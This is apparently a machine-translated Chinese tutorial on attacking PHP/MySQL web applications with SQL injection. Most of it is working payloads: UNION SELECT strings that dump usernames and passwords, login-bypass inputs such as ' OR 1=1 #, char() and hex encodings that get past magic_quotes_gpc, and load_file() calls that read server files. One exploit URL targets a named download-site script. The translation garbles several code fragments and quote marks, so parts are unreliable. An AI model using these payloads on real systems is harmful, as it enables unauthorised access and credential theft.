PHP Injection (ii)

Let's build the injection statement.
Enter in input box
a% and 1=2 Union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor# into the SQL statement.

SELECT * from alphadb where the title like%a% and 1=2 Union Select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor#%

How, come out, haha, everything in control.

C: Let's take a look at all the injection attacks from the injection site.
1 First look at the background landing OH
Code First
login.php
.......
$query = "SELECT * from Alphaauthor where username="
. $HTTP _post_vars["UserName"]. "and
Password= ". $HTTP _post_vars["Password"]. " ";
$result =mysql_query ($query);
$data =mysql_fetch_array ($result);
if ($data)
{
echo "Backstage landing success";
}
Esle
{
echo "re-landing";
Exit
｝

.........
?>
Username and password were executed directly into SQL without any processing.
See how we get around it?
The classic or the one:
Enter the username and password box.
' OR =
into the SQL statement.
SELECT * from Alphaauthor where username= or = and password= or =
This brings in the $data must be true, that is, we successfully landed.
There are other bypass methods , the principle is the same, is to find ways to let $data return is true.
We can use these in the following ways OH
1.
User name and password are entered or a = a
SQL has become
SELECT * from Alphaauthor where username= or a = A and password=
or a = a

2.
User name and password are entered or 1=1 and ' =
SQL has become
SELECT * from Alphaauthor where username= or 1=1 and ' =
and password= or 1=1 and ' =

User name and password are entered or 2>1 and ' =
SQL has become
SELECT * from Alphaauthor where username= or 2>1 and ' =
and password= or 2>1 and ' =

3.
User name Input or 1=1 # password to enter freely
SQL has become
SELECT * from Alphaauthor where username= or 1=1 # and
password= anything

The back part is commented out, of course, return is true oh.
4.
Assuming admin's id=1, you can also

User name Input or id=1 # password to enter freely
SQL has become
SELECT * from Alphaauthor where username= or id=1 # and password= anything

What do you think? It landed directly!

As the saying goes, only can not think of can not do.
There are more construction methods waiting for you to think after class.

2 The second commonly used place of injection should be regarded as the location of the foreground data display.
It has been mentioned several times, and involves the digital type, character type, and so on, here will not repeat the ha.
Just to give an example of a retrospective
The blue sea Tide sound downloads the station-v2.0.3 Lite has injected the flaw, the code is no longer listed
Look directly at the results
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%
20dl_users

Look, we got what we wanted again.
User name Alpha
A long string of passwords.
Why we put the password in the 3 field, put the username in the 5 field, we have mentioned above Oh, we guess 3 and 5 paragraphs should be string type, and we want to display the username and password of the field type should be the same, So let's put it this way oh.
Why do you use 18 fields? I do not know if you remember in the Union select Introduction where we mentioned that Union must require the same number of fields before and after select, we can increase the number of select to guess that the need for 18 fields, only so the content of the Union select will be the normal display Oh!
3 Other such as data modification, the user registration of the place is mainly user-level applications.
We've talked about the update and insert above, because it's not very common, it's no longer discussed here, and there are some advanced techniques for using UPDATE and insert.
Two: Below will enter the Magic_quotes_gpc=on time the injection attack teaching link
When Magic_quotes_gpc=on, all of the variables (single quotes) are handed in,
"(double quotes), \ (backslash), and null characters are automatically converted to escape characters that contain backslashes.
This makes the method of character injection go to naught, when we can only inject the digital type and not
Intval () Processing of the situation, digital we have talked a lot of it, because the digital type does not use single quotes naturally do not bypass the problem, for this situation we direct injection can be.
1 if it's a character, it has to look like this, without quotes on the character.

Here we're going to use some string processing functions first,
There are a lot of string processing functions, here we mainly talk about the following several, specifically can refer toMySQLChinese reference manual 7.4.10.

char () interprets the argument as an integer and returns a string consisting of the ASCII code characters of these integers.
Of course, you can also use the character of the 16 to replace the character, so it is also possible, the method is in front of the 16 plus 0x, see the example below to understand.

login.php
......
$query = "SELECT * from". $art _system_db_table[user]. "
where Username= $username and password= ". $Pw." ";
......
?>

Let's say we know the backend username is Alpha.
Converted to ASCII followed by char (97,108,112,104,97)
The conversion into 16 is 0x616c706861

Okay, just type in the browser:

Http://localhost/site/admin/login.php?username=char (97,108,112,104,97)%23
The SQL statement becomes:

SELECT * FROM Alphaaut

Hor where Username=char (97,108,112,104,97) # and password=

As we expected, he carried it out smoothly and we got what we wanted.
Of course, we can also construct
Http://localhost/site/admin/login.php?username=0x616C706861%23
The SQL statement becomes:
SELECT * from Alphaauthor where username=0x616c706861%23# and password=
Once again, we are winners. It's a sense of accomplishment.

Maybe you'll ask if we can put the # in char ()
actually char (97,108,112,104,97) equals alpha
Note that Alpha is quoted as an alpha string.
We know in MySQL if the execution

Mysql> SELECT * from Dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column alpha in WHERE clause
Look at the return error. Because he would think Alpha was a variable. So we have to put quotes on Alpha.
As follows
Mysql> SELECT * from dl_users where username= Alpha;
This is the right thing to do.
If you put the number in there, it's alpha#.
Bring into SQL statement
SELECT * from dl_users where username= alpha#;
Of course there is nothing, because even alpha# this user does not have.
OK, let's take a look at the following example

display.php
......
$query = "SELECT * from". $art _system_db_table[Article]. "
where type= $type;
......
?>

The code displays the content based on the type, $type does not have any filtering, and is not placed in the program with quotes.
Assuming the type contains the Xiaohua class, Xiaohua char () is converted to
char (120,105,97,111,104,117,97)

We build
Http://localhost/display.php?type=char (120,105,97,111,104,117,97) and 1=2 Union select 1,2,username,4,password, 6,7,8,9,10,11 from Alphaauthor
Brought into the SQL statement as:
SELECT * from ". $art _system_db_table[Article]."
where Type=char (120,105,97,111,104,117,97) and 1=2 Union select 1,2,username,4,password,6,7,8,9,10,11 from Alphaauthor
Look, our username and password are still coming out Oh! No screenshots, just imagine: P

2 Perhaps some people will ask, in the case of Magic_quotes_gpc=on powerful load_file () can still use it?
This is exactly the problem we are going to use, and the format of Load_file () is load_file (' File path ')
We found that simply converting the ' file path ' to char () would be OK. Try it!
Load_file (' C:/boot.ini ') into
Load_file (char (99,58,47,98,111,111,116,46,105,110,105))
Figure 22

Put it in a concrete injection.
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,load_file (Char
(99,58,47,98,111,111,116,46,105,110,105)), 4,5,6,7,8,9,10,11,12,13,14,15,16,
17,18

Look, we've seen the contents of Boot.ini, OH.
It is a pity that into the outfile can not be bypassed, otherwise it will be more fun. But there is still one place where you can use the SELECT * from table into outfile. (Sell a few words first, the following will tell you)